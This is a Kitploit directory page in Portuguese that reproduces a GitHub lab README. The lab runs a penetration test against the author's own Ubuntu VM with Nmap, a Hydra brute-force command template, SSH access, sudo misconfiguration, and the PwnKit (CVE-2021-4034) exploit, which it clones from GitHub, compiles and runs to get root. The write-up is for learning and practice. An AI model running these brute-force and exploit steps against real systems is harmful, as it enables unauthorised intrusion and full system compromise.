Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/vaibhavkrishna12004/ubuntu-privesc-lab
Escalada de PrivilégiosReconhecimentoMapeamento de RedeAtaques de SenhaEscaneamento de PortasAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoConfiguração Incorreta

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Aprendizado e Educação
Labs e Prática
GitHubvaibhavkrishna12004/ubuntu-privesc-lab

ubuntu-privesc-lab

Fluxo de trabalho completo de teste de penetração: força bruta de credenciais, acesso SSH e escalonamento de privilégios (CVE-2021-4034)

Ver Repositório
19há 5 mesesAinda não revisado

ubuntu-privesc-lab

Fluxo completo de teste de penetração: força bruta de credenciais, acesso SSH e escalonamento de privilégios (CVE-2021-4034)

VISÃO GERAL

Este projeto demonstra um fluxo completo de teste de penetração contra uma máquina virtual Ubuntu vulnerável. A cadeia de ataque inclui reconhecimento, força bruta de credenciais, acesso inicial e escalonamento de privilégios usando múltiplas técnicas.

FERRAMENTAS UTILIZADAS

Nmap Hydra SSH Git CVE-2021-4034 (PwnKit)

RECONHECIMENTO

O reconhecimento foi realizado usando Nmap, que revelou o número de hosts ativos na rede específica (wifi). nmap < Network IP 0/24 > : Isso revelou o número de hosts ativos e seus endereços MAC. Reconhecimento para encontrar VM 1

Como observado, a VM estava sendo executada no ORACLE VIRTUAL BOX, pudemos identificar que esta era nossa VM vulnerável e o IP a seguir.

Reconhecimento para VM 2

Uma varredura adicional revelou portas abertas vulneráveis detectadas para ataque.

EXPLORAÇÃO PRIMÁRIA

Usando isso, tentei um ataque de força bruta de credenciais bem-sucedido com a ajuda do Hydra hydra -l < USERNAME > or -L < File.txt > -p < PASSWORD > or -P < File.txt > < TARGET IP > < PORT >

Hydra para VM Vulnerável

Esse exploit de senha bem-sucedido nos levou a usar as credenciais para a exploração da porta SSH também.

ssh < USERNAME@TARGET IP > Password < exploit password >

Exploração SSH usando credenciais obtidas da senha

Isso nos deu acesso inicial ao sistema da vítima. Além disso, a má configuração do sudo nos deu acesso total ao root. sudo -l : (ALL : ALL) ALL

sudo su foi o escalonamento

EXPLORAÇÃO SECUNDÁRIA

Continuamos a explorar o sistema da vítima com a ajuda do "Pwnkit CVE-2021-4034".

PwnKit (CVE-2021-4034) é uma vulnerabilidade crítica de segurança descoberta no início de 2022 pela equipe de pesquisa da Qualys, afetando o framework Polkit em sistemas Linux. É uma falha de escalonamento local de privilégios (LPE) que permite que qualquer usuário padrão e sem privilégios obtenha privilégios totais de root (acesso administrativo) em um sistema. A vulnerabilidade existe desde a introdução do Polkit em 2009 e é considerada "trivial" de explorar, tornando-a altamente perigosa.

Common Vulnerabilities and Exposures (CVE) é uma lista padronizada e publicamente divulgada de vulnerabilidades e exposições de segurança cibernética em software e hardware.

INSTALANDO O CVE-2021-4034 e Explorando a VM

Primeiro, confirmei que o sistema alvo era potencialmente vulnerável verificando a presença e as permissões do pkexec: which pkexec output: ls -la /usr/bin/pkexec O binário tinha o bit SUID configurado, indicando que é executado com privilégios de root, tornando-o um alvo viável para exploração.

Preparar o Ambiente

Para compilar o exploit, as ferramentas necessárias foram instaladas: sudo apt update sudo apt install git build-essential -y Isso garantiu que o sistema tivesse o compilador e as dependências necessárias. Se o apt do sistema tiver tarefas em segundo plano em execução, mate-as.

Transferir / Obter Código do Exploit

O exploit foi clonado diretamente na máquina da vítima: cd /tmp git clone https://github.com/berdav/CVE-2021-4034.git cd CVE-2021-4034 Usar /tmp evita desorganização e reflete um comportamento realista de atacante. Instalando o CVE-2021-4034 Instalação do Git para o CVE KIT

Compilar o Exploit

O exploit foi compilado usando: "make" Isso gerou o executável necessário para acionar a vulnerabilidade.

Executar o Exploit

O exploit foi executado: ./cve-2021-4034

Verificar o Escalonamento de Privilégios

Após a execução, o acesso root foi confirmado: whoami Output: root

Exploração de privilégios e acesso à VM

Este exploit funciona porque o pkexec lida incorretamente com variáveis de ambiente, permitindo que atacantes executem código arbitrário com privilégios elevados.

CONCLUSÃO

Este exercício demonstra como um usuário aparentemente com poucos privilégios pode escalar para o controle total do sistema explorando uma vulnerabilidade conhecida como PwnKit (CVE-2021-4034). Ao combinar o acesso inicial por meio de comprometimento de credenciais com enumeração e exploração sistemáticas, foi possível alcançar acesso root sem depender apenas de configurações incorretas. Isso destaca a importância crítica da gestão oportuna de patches e práticas de configuração seguras. Mesmo uma única vulnerabilidade negligenciada pode levar ao comprometimento completo do sistema, enfatizando a necessidade de avaliações contínuas de segurança e estratégias de defesa em profundidade.

Baixar ferramenta